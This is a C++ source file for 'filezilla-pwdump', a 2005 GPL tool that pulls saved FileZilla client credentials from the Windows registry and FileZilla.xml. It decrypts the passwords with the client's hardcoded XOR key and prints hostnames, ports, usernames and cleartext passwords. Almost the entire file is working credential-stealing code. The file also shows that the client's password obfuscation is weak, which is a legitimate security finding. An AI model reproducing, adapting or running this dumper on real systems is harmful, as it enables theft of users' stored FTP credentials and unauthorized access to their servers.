/*
	Filename:	filezilla-pwdump.cpp
    Title:		FileZilla Client - Weakly encrypted password dumper v0.1
	Author:		pagvac (Adrian Pastor)
	Date:		10th September, 2005
    License:	GPL
	email:		m123303[|a t|]richmond.ac.uk

  	Homepage:	www.ikwt.com (In Knowledge We Trust)
				www.adrianpv.com
				(these 2 URLs contain the last version of this tool)
	
	Description:this tool dumps all FileZilla (client) credentials from the 
				Windows Registry and/or the "FileZilla.xml" config file and 
				decrypts all found passwords.
				
				It should work on FileZilla client <=2.2.15 and probably in
				newer versions since it doesn't seem like the developers 
				will change the way the passwords are obsfucated any time soon.

				This tool will *only* work if the FileZilla client is present
				on your system *and* the user is using the "Save Passwords" feature
	
	Copyright (C) 2005  pagvac (Adrian Pastor)
	XML parser library by Frank Vanden Berghen

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/


//Includes
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#include ".\reglib\reglib.h"
#include ".\xmlParser\xmlParser.h"

//Macros
#define MAX_SIZE 150

//Global variable (cipher key)
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";


//PRE:	decimal values representing ASCII chars,
//		every three digits becomes one ASCII char
//		e.g.:	042040063063
//POST: ASCII chars are copied back to buff[] 
//		e.g.:	*(??
//		the length of the new string is returned
int digit2char(char buff[])
{
	char tmp_buff[4], ascii_buff[MAX_SIZE];
	unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);
	for(i=0,j=0;i<strlen(buff);i+=3,++j) 
	{
		tmp_buff[0]=buff[i];
		tmp_buff[1]=buff[i+1];
		tmp_buff[2]=buff[i+2];
		tmp_buff[3]='\0';
		
		n=atoi(tmp_buff);
		ascii_buff[j]=(char)n;
	}
	ascii_buff[j]='\0';
	//printf("ascii_buff:%s\n", ascii_buff);
	strcpy(buff, ascii_buff);

	return len;
}

//PRE: buffer containing ASCII chars of cipher 
//     (rather than their numberic ASCII value)
//POST:length of cleartext password is returned
unsigned int decrypt(char *buff /*buff[MAX_SIZE]*/)
{
	unsigned int i, pos, len;
	
	len=digit2char(buff);
	//printf("%d\n", len);
	pos=len%strlen(m_key);
	
	for (i=0;i<len;i++)
	{
		buff[i]=buff[i]^m_key[(i+pos)%strlen(m_key)];
		//printf("%s", buff[i]);
	}
	//printf("\n");
	return len;
}

//This function dumps credentials and decrypts passwords from "FileZilla.xml"
void dumpconfig(char *path)
{
	XMLNode xMainNode, xNode;
	unsigned int i=0, j=0, k=0, n=0, len=0;
	char ciphertext[MAX_SIZE];
	const char *tmp;

	// open and parse XML file 
	xMainNode=XMLNode::openFileHelper(path,"FileZilla");

	
	xNode=xMainNode.getChildNode("Sites"); 
	
	// get the number of "Site" tags  
	n=xNode.nChildNode("Site");

	// print different attribute values for all the "Site" tags
    for (i=0; i<n; i++,j++)
	{
		printf("Name:\t\t\t%s\n",xNode.getChildNode("Site", j).getAttribute("Name"));
		printf("Server hostname:\t%s\n",xNode.getChildNode("Site", j).getAttribute("Host"));
		printf("TCP port:\t\t%s\n",xNode.getChildNode("Site", j).getAttribute("Port"));
		
		//FTP connection is anonymous
		if( strcmp(xNode.getChildNode("Site", j).getAttribute("Logontype"), "0") == 0 )
		{
			printf("Username:\t\t%s\n", "anonymous");
			printf("Password:\t\t[anyusername]@[anydomain]\n");
			printf("(anonymous connection)\n");
		}
		//FTP connection is NOT anonymous (regular connection)
		else
		{
			printf("Username:\t\t%s\n",xNode.getChildNode("Site", j).getAttribute("User"));
			printf("Encrypted password:\t%s\n",xNode.getChildNode("Site", j).getAttribute("Pass"));
			
			tmp= (xNode.getChildNode("Site", j).getAttribute("Pass") );
			strcpy(ciphertext, tmp);
			len=decrypt(ciphertext);

			printf("Cleartext password:\t", ciphertext);
			for(k=0;k<len;++k)
				printf("%c", ciphertext[k]);
			printf("\n");
		}		
		printf("\n");
	}
}

int main(void) 
{
	FILE *fp;
	char filezilla_dir[256];
	unsigned int len=0,i=0, j=0;
	CReg *RegObj=new CReg;
	HKEY hKey;
	LONG returnStatus, lKeyEnumRet;
	DWORD dwLength=255;
	char lszMainKey[255]="Software\\FileZilla\\Site Manager";
	char lszSubKey[255], lszTmpKey[255], lszValueData[255];
	unsigned short notfound=0, regKeyFound=0, xmlFileFound=0;

	//HKEY_CURRENT_USER\Software\FileZilla\Site Manager

	returnStatus=RegOpenKeyEx(HKEY_CURRENT_USER, lszMainKey, 0L, KEY_READ, &hKey);
	
	printf("filezilla-pwdump by pagvac (Adrian Pastor) - www.ikwt.com - www.adrianpv.com\n");
	printf("****************\n\n");
	printf("Note: this tool will *only* work if the FileZilla client is present\n");
	printf("on your system *and* the user is using the \"Save Passwords\" feature.\n\n");

	// registry key opened successfully
	if(returnStatus==ERROR_SUCCESS)
	{
		printf("Filezilla registry key found!\n");
		//printf("This should mean that FileZilla is installed on your system.\n\n");
		while(1)
		{
			lKeyEnumRet = RegEnumKey(hKey,	i, lszSubKey, dwLength);
			
			if(lKeyEnumRet!=ERROR_SUCCESS)
				break;
			
			printf("Connection name:\t%s\n", lszSubKey);
			//printf("%d\n", i);
			strcpy(lszTmpKey, lszMainKey);
			strcat(lszTmpKey, "\\");
			strcat(lszTmpKey, lszSubKey);
			//printf("%s\n", lszTmpKey);

			RegObj->QueryStrVal(HKEY_CURRENT_USER, lszTmpKey, "Host", lszValueData);
			printf("Server hostname:\t%s\n", lszValueData);
			RegObj->QueryStrVal(HKEY_CURRENT_USER, lszTmpKey, "Port", lszValueData);
			printf("TCP port:\t\t%s\n", lszValueData);
			RegObj->QueryStrVal(HKEY_CURRENT_USER, lszTmpKey, "Pass", lszValueData);
			
			//Password found
			if(strlen(lszValueData)!=0)
			{	
				printf("Encrypted password:\t%s\n", lszValueData);
				len=decrypt(lszValueData);
				printf("Cleartext password:\t");
				for(j=0;j<len;++j)
					printf("%c", lszValueData[j]);
			
			}	
			
			//Password NOT found
			else
			{	
				RegObj->QueryStrVal(HKEY_CURRENT_USER, lszTmpKey, "User", lszValueData);
				if(strlen(lszValueData)==0)
				{	
					printf("Username:\t\tanonymous\n");
					printf("Password:\t\t[anyusername]@[anydomain]\n");
					printf("(This is an anonymous connection)\n");
				}
				else	
					printf("Password not saved!\n");
			
			}
			//printf("%d\n", i);
			printf("\n\n");
			i++;
		}
		RegCloseKey(hKey);
	}
	
	else
	{
		printf("FileZilla registry key *not* found\n");
	}


	fp=fopen("\\Program Files\\FileZilla\\FileZilla.xml", "r");
	if(fp!=NULL)
	{	
		strcpy(filezilla_dir, "\\Program Files\\FileZilla\\FileZilla.xml");
		printf("'FileZilla.xml' file found in %s!\n", filezilla_dir);
		// parse settings from XML file
		dumpconfig(filezilla_dir);
	}
	
	else
	{
		fp=fopen("c:\\Program Files\\FileZilla\\FileZilla.xml", "r");
		if(fp!=NULL)
		{
			strcpy(filezilla_dir, "c:\\Program Files\\FileZilla\\FileZilla.xml");
			printf("'FileZilla.xml' file found in %s!\n", filezilla_dir);
			//parse settings from XML file
			dumpconfig(filezilla_dir);
		}	
		else
		{	
			fp=fopen("FileZilla.xml", "r");
			if(fp!=NULL)
			{
				strcpy(filezilla_dir, "FileZilla.xml");
				printf("'FileZilla.xml' file found in %s!\n", filezilla_dir);
				//parse settings from XML file
				dumpconfig(filezilla_dir);
			}	
			else
				notfound=1;
		}
	}	
			
			
	if(notfound)
	{
		printf("'FileZilla.xml' couldn't be found.\n");
		printf("Try copying 'FileZilla.xml' to the same folder where you're running filezilla-pwdump from...");
	}

	//system("pause");
	return 0;
}